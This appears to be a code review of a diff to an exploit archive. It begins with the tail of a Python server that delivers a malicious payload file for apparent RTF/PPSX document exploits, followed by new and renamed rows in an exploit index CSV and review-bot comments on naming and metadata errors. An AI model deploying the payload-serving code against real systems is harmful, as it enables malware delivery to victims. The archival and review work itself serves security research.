+ data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
+ with open(payloadlocation) as fin:
+ data +=fin.read()
+ conn.send(data)
+ conn.close()
+ sys.exit(1)
+ if method in ['GET', 'get']:
+ print "Received GET method from "+client_addr[0]
+ data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
+ conn.send(data)
+ conn.close()
+ sys.exit(1)
+ except socket.error, ex:
+ print ex
+
+
if __name__ == '__main__':
main(sys.argv[1:])
\ No newline at end of file
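Review bot: The second module-level `def server_thread(conn, client_addr):` rebinds the name, so the earlier `server_thread` (the one the `@@ -268,13 +412,30 @@` hunk edits) becomes dead code, and if `exploitation_rtf` hands `server_thread` to `thread.start_new_thread` the way `exploitation_ppsx` does, both modes run this handler; give the two handlers distinct names such as `server_thread_rtf` and `server_thread_ppsx` and reference the right one from each `exploitation_*` function. In `exploitation_ppsx`, `except socket.error, (value, message): if s:` reads `s` before it is bound when `socket.socket()` itself raises, giving a NameError instead of the intended message. `print "Unable to read"+payloadlocation` here lacks the space that the same commit adds to the identical line in the other handler, and `exploitation_ppsx` is otherwise a verbatim copy of `exploitation_rtf`, which a single function taking the handler as a parameter would replace.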
diff --git a/files_exploits.csv b/files_exploits.csv
index bfd5f934d..8721c2edd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5883,6 +5883,8 @@ id,file,description,date,author,type,platform,port
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44213,exploits/hardware/dos/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,qwertyoruiop,dos,hardware,
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
+44221,exploits/windows/dos/44221.py,"SEGGER embOS/IP FTP Server 3.22 - Denial of Service",2018-03-02,hyp3rlinx,dos,windows,
+44222,exploits/windows/dos/44222.txt,"DualDesk 20 - 'Proxy.exe' Denial of Service",2018-03-02,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -7037,7 +7039,7 @@ id,file,description,date,author,type,platform,port
14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
-14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios,
+14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'",2010-08-03,jailbreakme,local,ios,
14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows,
@@ -7059,7 +7061,7 @@ id,file,description,date,author,type,platform,port
14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,
14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
-14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows,
+14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'",2010-08-24,"Jose Miguel Esparza",local,windows,
14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
@@ -9020,7 +9022,7 @@ id,file,description,date,author,type,platform,port
38362,exploits/windows/local/38362.py,"MakeSFX.exe 1.44 - Local Stack Buffer Overflow",2015-09-30,hyp3rlinx,local,windows,
38371,exploits/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation",2015-10-01,rebel,local,osx,
38381,exploits/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,local,windows,
-38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows,
+38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows,
38390,exploits/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",local,linux,
38403,exploits/windows_x86/local/38403.txt,"TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",local,windows_x86,
38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",local,windows,
@@ -9335,7 +9337,7 @@ id,file,description,date,author,type,platform,port
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
-43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware,
+43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader",2017-12-27,Specter,local,hardware,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@@ -9359,6 +9361,7 @@ id,file,description,date,author,type,platform,port
44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44042,exploits/windows/local/44042.md,"Hotspot Shield - Information Disclosure",2018-01-30,SecuriTeam,local,windows,
+44217,exploits/windows/local/44217.py,"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)",2018-03-02,bzyo,local,windows,
44049,exploits/linux/local/44049.md,"Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation",2017-11-23,SecuriTeam,local,linux,
44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
@@ -9549,12 +9552,14 @@ id,file,description,date,author,type,platform,port
44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
+44218,exploits/windows/local/44218.py,"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)",2018-03-02,bzyo,local,windows,
44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware,
-44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
+44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
+38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -10366,7 +10371,7 @@ id,file,description,date,author,type,platform,port
4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows,
4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows,
4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux,
-4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios,
+4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation 'Jailbreak'",2007-10-11,"Niacin & Dre",remote,ios,
4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,
4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple,
4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501
@@ -16276,7 +16281,11 @@ id,file,description,date,author,type,platform,port
44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
-44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware,
+44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,
+44226,exploits/php/remote/44226.txt,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution",2018-03-02,"Manish Tanwar",remote,php,
+44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
+44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
+44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
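Review bot: The version bound in the new 44226 entry, `TestLink Open Source Test Management < 1.9.16 - Remote Code Execution`, appears inconsistent with the exploit's own text, which (as far as I can tell from the 44226.txt header) describes 1.9.16 itself as affected and 1.9.17 as the first fixed release. Since this CSV is the index people search when triaging CVE-2018-7466, an off-by-one in the range would cause a vulnerable 1.9.16 install to be passed over; please verify against the advisory and, if confirmed, change the description to `TestLink Open Source Test Management <= 1.9.16 - Remote Code Execution`. The other three added rows (44227–44229) carry 2017 dates while being imported in this 2018 commit; that is consistent with this index using the original disclosure date rather than the import date, but worth a second look so the date column stays uniform.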
@@ -25602,7 +25611,7 @@ id,file,description,date,author,type,platform,port
18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,
18224,exploits/php/webapps/18224.php,"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution",2011-12-09,mr_me,webapps,php,
18230,exploits/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",webapps,php,
-18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php,
+18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM Polls 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php,
18232,exploits/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",webapps,php,
18233,exploits/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,webapps,php,
18236,exploits/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,webapps,php,
@@ -38935,3 +38944,5 @@ id,file,description,date,author,type,platform,port
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
+44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
+44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
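Review bot: The 44223 row files the uWSGI directory traversal under `exploits/php/webapps/` with platform `php`, but uWSGI is an application server written in C (commonly fronting Python/WSGI apps) rather than a PHP web application, so this looks misclassified; a path and platform such as `exploits/multiple/webapps/44223.txt` / `multiple` (or `linux`) would be found by the people actually affected. If the classification was deliberate because the advisory targets uWSGI's PHP plugin, a note in the exploit file would justify it, but nothing in the row itself indicates that. The 44219 D-Link entry drops any hardware/firmware version from the description; other hardware rows in this index include one where known, so consider appending the tested version if the advisory states it.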